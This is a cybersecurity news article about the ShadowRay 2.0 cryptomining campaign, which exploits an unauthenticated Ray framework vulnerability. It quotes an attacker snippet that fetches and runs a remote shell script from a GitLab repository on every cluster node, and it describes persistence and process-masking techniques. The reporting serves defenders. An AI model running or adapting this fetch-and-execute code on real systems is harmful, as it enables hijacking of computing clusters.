Cybersecurity researchers have uncovered an active global hacking campaign leveraging a known flaw in Ray, an open-source AI framework widely used for managing distributed computing tasks.
Dubbed ShadowRay 2.0, this attack exploits vulnerability CVE-2023-48022 to silently seize control of powerful AI computing clusters and turn them into cryptocurrency mining operations.
The campaign represents a significant escalation from the initial ShadowRay discovery in March 2024, with attackers employing sophisticated tactics to remain hidden while extracting maximum value from compromised infrastructure.
Oligo Security researchers identified the attack campaign in early November 2025, discovering that threat actors using the name IronErn440 have weaponized Ray’s legitimate orchestration features into tools for self-propagating attacks.
What makes this threat particularly alarming is the sheer scale of exposure. The number of exposed Ray servers worldwide has grown from thousands during the original discovery to more than 230,000 instances today.
Many belong to active startups, research laboratories, and cloud-hosting providers, creating an expansive attack surface.
Oligo Security security analysts identified the attack after observing region-aware malware being distributed through GitLab.
The attackers initially leveraged the DevOps platform to deliver customized payloads adapted to each victim’s geographic location.
After GitLab took down the malicious repository on November 5, 2025, the threat actors quickly migrated their operation to GitHub, demonstrating remarkable operational agility.
By November 10, they had established a new repository and continued their campaign with even greater sophistication.
AI Attacking AI Infrastructure
The attack unfolds through multiple coordinated stages, beginning with reconnaissance using interact.sh, an out-of-band platform that lets attackers identify vulnerable servers without traditional noisy scanning.
Attackers send probes targeting Ray’s unprotected Jobs API, triggering callbacks from vulnerable instances. Once targets are identified, they exploit the unauthenticated Ray dashboard to submit malicious jobs that execute arbitrary code with cluster privileges.
.webp "New ShadowRay Attack Exploit Ray AI-Framework Vulnerability to Attack AI Systems 3")
The most notable aspect is the use of AI-generated payloads. The attackers deploy Python code that automatically discovers available cluster resources, calculates 60 percent CPU and GPU allocation to avoid immediate detection, and then injects cryptocurrency miners disguised as legitimate system processes.
The payloads demonstrate sophisticated error handling and self-adaptation, suggesting they were generated or refined using AI tools to accelerate payload development.
A critical code snippet shows the multi-stage infection mechanism. The initial access payload uses Ray’s NodeAffinitySchedulingStrategy to enumerate cluster nodes and deploy infection scripts to each one:-
nodes=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.
They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] and dns-filter services, effectively hiding in plain sight.
.webp "New ShadowRay Attack Exploit Ray AI-Framework Vulnerability to Attack AI Systems 4")
What sets this campaign apart is the active competition dynamics. Attackers deploy scripts to detect and terminate rival cryptocurrency miners, then block competing mining pools through iptables rules and host file modifications.
They even target pools on specific ports used by competing threat actors, revealing an underground ecosystem where multiple criminal groups fight for the same compromised resources.
The infrastructure adaptation is equally concerning. For victims in China, attackers deliver region-specific payloads through proxy services to bypass network restrictions.
They employ geographic detection via ip-api.com, executing different scripts for Chinese versus international targets.
The attackers continuously update their payloads through GitLab commits, treating infrastructure as code and enabling real-time evolution of their techniques without redeploying to victim machines.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
